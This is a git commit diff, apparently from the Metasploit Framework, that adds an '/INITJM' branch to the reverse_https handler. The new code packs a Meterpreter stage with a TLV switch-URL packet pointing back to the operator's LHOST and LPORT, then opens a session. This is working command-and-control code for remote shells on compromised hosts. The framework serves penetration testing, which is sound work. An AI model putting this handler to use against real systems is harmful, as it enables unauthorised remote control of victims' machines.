hmf, missed this one, too. see #5288

git-svn-id: file:///home/svn/framework3/trunk@13743 4d416f70-5f16-0410-b530-b9f4589650da
2011-09-16 21:31:21 +00:00 · 2011-09-16 21:31:21 +00:00 · c0ddf56ec0
parent 7e4826bae4
commit c0ddf56ec0
1 changed files with 30 additions and 0 deletions
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@ -126,6 +126,36 @@ protected

 		# Process the requested resource.
 		case req.relative_resource
+			when /^\/INITJM/
+				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+				#$stdout.puts "URL: #{url.inspect}"
+
+				blob = ""
+				blob << obj.generate_stage
+
+				# This is a TLV packet - I guess somewhere there should be API for building them
+				# in Metasploit :-)
+				packet = ""
+				packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"
+				packet << [url.length+8, 0x1000a].pack('NN')+url
+				packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN')
+				packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN')
+				blob << [packet.length+8, 0].pack('NN') + packet
+
+				resp.body = blob
+				conn_ids << conn_id
+
+				# Short-circuit the payload's handle_connection processing for create_session
+				create_session(cli, {
+					:passive_dispatcher => obj.service,
+					:conn_id            => conn_id,
+					:url                => url,
+					:expiration         => datastore['SessionExpirationTimeout'].to_i,
+					:comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+					:ssl                => false
+				})
+
 			when /^\/A?INITM?/

 				url = ''